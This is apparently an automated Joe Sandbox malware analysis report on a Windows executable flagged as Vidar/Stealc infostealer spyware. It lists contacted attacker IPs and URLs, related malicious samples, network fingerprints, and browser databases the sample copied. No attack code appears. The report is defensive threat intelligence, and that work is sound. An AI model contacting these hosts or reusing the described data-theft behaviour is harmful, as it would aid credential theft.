                                                                                                                                                https://steamcommunity.com/discussions/UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://95.217.220.103/softokn3.dllCUMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0UMrFwHyjUi.exefalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://store.steampowered.com/stats/UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown

                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public IPs

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    92.122.104.90
                                                                                                                                                    		steamcommunity.comEuropean Union
                                                                                                                                                    		16625AKAMAI-ASUStrue
                                                                                                                                                    95.217.220.103
                                                                                                                                                    		unknownGermany
                                                                                                                                                    		24940HETZNER-ASDEtrue

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                    Analysis ID:1540306
                                                                                                                                                    Start date and time:2024-10-23 17:04:04 +02:00
                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 7m 23s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                    Number of analysed new started processes analysed:13
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Sample name:UMrFwHyjUi.exe
                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                    Original Sample Name:0d90ef55d1b1cb43ccb8fd30bbeba1a4.exe
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@11/24@2/2
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 66.7%
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 97%
                                                                                                                                                    • Number of executed functions: 94
                                                                                                                                                    • Number of non-executed functions: 251
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                    Warnings

                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                    • Execution Graph export aborted for target UMrFwHyjUi.exe, PID 4432 because there are no executed function
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                    • VT rate limit hit for: UMrFwHyjUi.exe

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    11:05:26API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                    11:05:32API Interceptor1x Sleep call for process: UMrFwHyjUi.exe modified

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    92.122.104.90file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                        SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          http://sneamcomnnumnlty.com/fact/actual/getGet hashmaliciousUnknownBrowse
                                                                                                                                                            https://u.to/xjPiIAGet hashmaliciousUnknownBrowse
                                                                                                                                                              https://sueamcoommunnlty.com/geting/activeGet hashmaliciousUnknownBrowse
                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                  AD3SI7tuzs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    http://steamcommuninty.com/playtestinvite/deadlockGet hashmaliciousUnknownBrowse
                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        95.217.220.103b157p9L0c1.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          PFlJLzFUqH.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                            46QSz6qyKC.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                              7ZthFNAqYp.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                M8PoiLFYWM.exeGet hashmaliciousVidarBrowse

                                                                                                                                                                                  Domains

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  steamcommunity.comb157p9L0c1.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                  PFlJLzFUqH.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                  46QSz6qyKC.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                  • 104.102.49.254

                                                                                                                                                                                  ASNs

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  AKAMAI-ASUSb157p9L0c1.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                  PFlJLzFUqH.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                  46QSz6qyKC.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                  roquette October.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 184.28.88.176
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                  phish_alert_sp2_2.0.0.0 - 2024-10-23T084901.360.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 2.19.126.160
                                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                  9wmt6bpcHr.elfGet hashmaliciousOkiruBrowse
                                                                                                                                                                                  • 104.91.53.81
                                                                                                                                                                                  https://wetransfer.com/downloads/21820466a51be0cc0de4ef5fd28415d320241023112541/61ecbec42424c68f99ca983cd530758a20241023112545/5d3030?t_exp=1729941941&t_lsid=761fb8c4-59e5-4423-a2fe-24d132de0406&t_network=email&t_rid=YXV0aDB8NjcxMjZmN2QzOGFjMDNkYThkOGJmMDM3&t_s=download_link&t_ts=1729682745&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 184.28.89.220
                                                                                                                                                                                  HETZNER-ASDEb157p9L0c1.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 95.217.220.103
                                                                                                                                                                                  PFlJLzFUqH.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 95.217.220.103
                                                                                                                                                                                  46QSz6qyKC.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 95.217.220.103
                                                                                                                                                                                  3cb770h94r.elfGet hashmaliciousOkiruBrowse
                                                                                                                                                                                  • 128.140.114.211
                                                                                                                                                                                  la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 88.198.204.226
                                                                                                                                                                                  7ZthFNAqYp.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 95.217.220.103
                                                                                                                                                                                  https://zupimages.net/up/24/42/ol13.jpg?d6mSMvU0ZvpGwffnuqPHYMR7NvlxIzVjDfTD4YJjdRSCOccGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 46.4.139.58
                                                                                                                                                                                  M8PoiLFYWM.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 95.217.220.103
                                                                                                                                                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 144.77.54.232
                                                                                                                                                                                  bin.i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                  • 144.78.138.87

                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  51c64c77e60f3980eea90869b68c58a8b157p9L0c1.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 95.217.220.103
                                                                                                                                                                                  PFlJLzFUqH.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 95.217.220.103
                                                                                                                                                                                  46QSz6qyKC.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 95.217.220.103
                                                                                                                                                                                  7ZthFNAqYp.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 95.217.220.103
                                                                                                                                                                                  M8PoiLFYWM.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 95.217.220.103
                                                                                                                                                                                  Unlock_Tool_2.3.1.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 95.217.220.103
                                                                                                                                                                                  aZm1EZ2IYr.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 95.217.220.103
                                                                                                                                                                                  Unlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 95.217.220.103
                                                                                                                                                                                  yAkRyU2LPe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 95.217.220.103
                                                                                                                                                                                  y45bCpZY1I.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 95.217.220.103
                                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19b157p9L0c1.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 92.122.104.90
                                                                                                                                                                                  PFlJLzFUqH.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 92.122.104.90
                                                                                                                                                                                  46QSz6qyKC.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 92.122.104.90
                                                                                                                                                                                  rMactation.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                  • 92.122.104.90
                                                                                                                                                                                  rMactation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                  • 92.122.104.90
                                                                                                                                                                                  X2lvDxMUmn.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                  • 92.122.104.90
                                                                                                                                                                                  SecuriteInfo.com.Win32.RATX-gen.30247.31729.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                  • 92.122.104.90
                                                                                                                                                                                  PAGO_____________________________________________________________________________9300179528.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                  • 92.122.104.90
                                                                                                                                                                                  vkkTIT6kcx.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                  • 92.122.104.90
                                                                                                                                                                                  7ZthFNAqYp.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  • 92.122.104.90

                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  C:\ProgramData\freebl3.dllb157p9L0c1.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                    PFlJLzFUqH.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                      46QSz6qyKC.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                            X2lvDxMUmn.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                  vkkTIT6kcx.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                      C:\ProgramData\mozglue.dllb157p9L0c1.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                        PFlJLzFUqH.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          46QSz6qyKC.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                X2lvDxMUmn.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                      vkkTIT6kcx.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse

                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                          C:\ProgramData\DBFCBGCGIJKJ\AEGDBA

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):114688
                                                                                                                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\ProgramData\DBFCBGCGIJKJ\BFBFBF

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\ProgramData\DBFCBGCGIJKJ\CAAEBF

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):9571
                                                                                                                                                                                                                          Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                          MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                          SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                          SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                          SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                          C:\ProgramData\DBFCBGCGIJKJ\CFHDHI

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\ProgramData\DBFCBGCGIJKJ\FHJEGI

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                          Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                          MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                          SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                          SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                          SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\ProgramData\DBFCBGCGIJKJ\GDAAKF

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):126976
                                                                                                                                                                                                                          Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                          MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                          SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                          SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                          SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\ProgramData\DBFCBGCGIJKJ\GDHIEH

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\ProgramData\DBFCBGCGIJKJ\GDHIEH-shm

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
